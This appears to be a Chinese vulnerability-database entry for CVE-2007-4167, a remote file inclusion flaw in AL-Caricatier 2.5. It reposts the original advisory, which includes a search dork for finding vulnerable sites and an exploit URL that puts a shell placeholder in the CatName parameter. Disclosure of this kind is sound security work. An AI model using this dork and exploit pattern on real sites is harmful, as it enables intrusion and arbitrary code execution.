AL-Caricatier 'cat_viewed.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189560 漏洞类型 未知
发布时间 2007-08-07 更新时间 2007-08-07
CVE编号 CVE-2007-4167 CNNVD-ID CNNVD-200708-074
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/85516
https://cxsecurity.com/issue/WLB-2007080029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-074
|漏洞详情
AL-Caricatier2.5版本的cat_viewed.php中存在PHP远程文件包含漏洞。远程攻击者可以借助CatName参数中的一个URL,执行任意PHP代码。
|漏洞EXP
Discovred By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Muhammed Zeed , Alaadin Gamos
----------------------------
Script: AL-Caricatier,V.2.5
----------------------------
Dork: "AL-Caricatier,V.2.5"
----------------------------
B.File: 
cat_viewed.php
----------------------------
Vuln code: Vul code:cat_viewed.php?op=open&CatID=$CatID&CatName=$CatName
----------------------------
Exploit:
www.name.com/AL-Caricatier,V.2.5/cat_viewed.php?op=open&CatID=$CatID&Cat
Name=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
|受影响的产品
AL-Caricatier AL-Caricatier 2.5
|参考资料

来源:BUGTRAQ
名称:20070804AL-CaricatierV.2.5RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/475641/100/0/threaded
来源:OSVDB
名称:39254
链接:http://osvdb.org/39254
来源:XF
名称:alcaricatier-catviewed-xss(35810)
链接:http://xforce.iss.net/xforce/xfdb/35810
来源:SREASON
名称:2962
链接:http://securityreason.com/securityalert/2962